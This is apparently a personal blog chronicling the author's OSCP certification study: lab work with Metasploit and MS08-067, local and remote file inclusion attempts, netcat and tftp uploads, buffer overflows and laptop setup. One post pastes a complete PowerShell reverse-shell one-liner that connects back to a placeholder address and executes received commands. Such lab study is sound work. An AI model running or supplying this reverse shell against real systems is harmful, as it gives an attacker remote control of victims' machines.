Finally, I am getting to Metasploit. Wow.

Well, I haven’t written for a while, but my daughter turned 4, my wife is expecting in July, and I am waking up pretty early to start studying these days. It’s a slow process, but I’ll get there. My plan is finish the labs, practice on and take the test in early September. I feel like failing the first time is simply a right of passage, so if that happens, at least I’ll know what to expect for the next time. I will get this cert. It might take time, but I am going to get it.

I am getting to the end of the labs, and I know now why metasploit is last and why you can only use it on one box – it’s pretty powerful. I did use it to pop my first shell on the lab machines – using 08-067 to exploit SMB!

This gif never gets old…

I didn’t know about meterpreter before the exploit, so I was hanging onto my shell for dear life, trying to upload a privilege escalation executable using certutil and tftp, but the shell was non-interactive and yeah… didn’t get far. But I started reading about meterpreter and all I could think about is how I am going to root that box now with my new knowledge.

The labs ask to perform a few things that I had to skip and gain my knowledge on – i.e., using metasploit to dump hashes and pass the hash. So now, I have to go back and finish up those labs. My lab report, w/o and writeups of pwning the 10 machines is almost at 200 pages. I am not going to fail to get those 5 points. Even if I have to come back and pay for more lab time.

I will have to say that I am really enjoying my time learning through PWK. People slam it for not being current (the exploits and the material), but I think that’s part of it – TRYING HARDER. Also, forget that man, it’s a VERY solid foundation for pen testing.

RCE using RFI attacks

Now that I have finished tackling LFI attacks, I am moving on to try to do a similar exploit, but rather than executing something from the victim machine, I will execute from my computer (the attacking machine) – hence “Remote File Inclusion” attacks, or RFI attacks.

I seem to be having some trouble with this one, and ultimately going with pausing on this and rethinking. My first thought was to serve php-reverse-shell from pentestmonkey from my machine, but it didn’t work.

I then backed up and thought to myself if the shell was working at all. So I decided to just upload the script on my victim machine and see if I could get a reverse shell. Well, my windows victim machine is super old and http cacheing wasn’t even letting me download the reverse shell to the machine over 80. I tried tftp, and nada. I finally zipped the script, and downloaded the .zip file.

Then I went ahead and unzipped on my victim machine and tried it. It would connect over netcat but then close the connection. So yeah, that’s not working. Honestly, at this point, I don’t even think that I should be downloading outside scripts to get the labs to work. So I am going to back up again, think about having nc.exe served from my machine, and execute a command to that executable. Then at least I can move on with the labs.

I do think there is value to getting the php-reverse-shell from pentestmonkey working though – it would be super valuable when I start popping boxes.

RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am today to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion attacks (LFI). I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.


…and I just extended my lab time.

This is a journey folks. And my journey includes a kid and a full time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of things that they say in the exercise is that they quote Lincoln – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. ūüôā

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!

Day 53 of the OSCP!!

I am slow – like really slow. I got through the enumeration section of the book pretty steadily, but now that I am working on Buffer Overflows, things are going slow and I am not as “quick” to pick back up the book.

I wake up at 4 am every day eager to study. After checking emails and reddit, I get in and make a little bit of progress. I really have to start putting more of my heart into this or else this OSCP is going to drag…

People take the test, what, like three times before they pass? I really need to get more wrapped in it, or this is going to be a really long process. I think I am going to buy 90 more days of lab to finish out the book, and then just go nuts on studying through and vulnhub. Take the test at the latest I can take it, and then if I fail, maybe 30 more days of lab and studying and then take it again.

I have a baby boy due in July so, yeah…. life happens, but it has always been my passion to pass this cert. I got this. Wish me luck.

15 days into to the OSCP and I am tired…

Hi everyone. I don’t think I officially started blogging about my OSCP journey. So, here, 15 days in and I am blogging while my latest PWK VM is being copied from C:/ to my NAS.

I have about 9 years of managerial cybersecurity experience under my belt, and as you can see from my earlier posts, I have been working for about 6 months getting prepped for my OSCP jump. I was working through Georgia Weidman’s Book, Penetration Testing: A Hands-On Introduction to Hacking, got frustrated at Cybrary for a hot one (some of the basic modules has flaws, not to mention my I would get kicked off the penetration testing pro track pretty much every week, and had to wait till Cybrary was back from the weekend to get sorted out). I thought about going back and doing my CE|H v10 but decided (thanks to my wife) that I should just go for the OSCP.

I was able to convince my work to flip the bill for 90 days of the lab and the materials, and whee! Here we go, into the rabbit hole. I have been scraping the web on people’s thoughts/preparation on the OSCP and shit myself in the process because this is a deep journey, and everyone is different, so I have to stop reading and just start moving.

Week 1: Got the monstrous course book, and the videos. Backed them up like three times since there is a fine for losing them and asking for them again. Worked verbatim through the videos, racking up some shell scripts and python on my PWK VM, and then realized that if I go through the book document all relevant exercises and pwn 10 machines, writing up a report, PDF it to Offensive Security, I would get 5 bonus points on my OSCP score. Some people say it’s not worth it, but I think it’s an awesome way to study and practice for the real deal, so I dropped doing the videos and started moving through the book.

Week 2: I am one slow man. I did manage to setup my PWK VM a bit better, realizing that terminator is the way to go, along with using OneNote to record my lab exercises and notes. I am three chapters out of 18 to go. I have a strange feeling that I will be asking for more lab time.

So, today I mounted an empty folder over my root folder in my PWK VM image today. I am not smart man. I can’t stress how glad I was for using OneNote online to backup my notes and exercises.  Backup, backup, backup.  The VMWare tools aren’t really working (at the moment) with the PWK VM, but after I messed everything up, I followed this chap’s thoughts on bridging a folder between the VM and the host, with the host folder backing up to the cloud. I chose OneDrive since my my OneNote online notebook for my notes and exercises were going there and the Surface Laptop I am using is so friggen integrated with OneDrive, I get that folder structure on my laptop mixed up with the simple core folders I have locally all the time. Moving forward, I see no reason not to back up my entire VM when I make changes to it.

Currently 6pm on 12/29/2018. I aim to get through a good portion of chapter 4 tomorrow. Remember, it’s an OSCP journey. I am so passionate about this stuff, and with time, I think I can rock this. I just need to be smart, and honestly, move a bit faster.

Finally landed on the Surface Laptop 2

Well, the Matebook¬†X Pro didn’t fair well to a dual boot with Kali and Windows.¬† ¬†I think it had something to do with the weird 3000×2000 resolution and the fact that grub couldn’t understand that to boot into an installer for Kali.¬† I tried working on different grub commands, but eh, I did so much that I couldn’t get the machine to boot back into the original install.

So I took it back to the store and decided VM only – no dual booting.¬† I mean, OSCP is set up to work within a VM, all my practice¬†books are with VMs.¬† So VM it is – and I need a good supported VM app, so Windows with VMWare Workstation was the way to go.¬† I also wanted a laptop that will last, so I put¬†up the extra cash for the new Surface Laptop 2.¬† I am happy so far.¬† I do wish it has a USB-C as the MXP did, but it wasn’t a deal breaker.¬† Back to studying!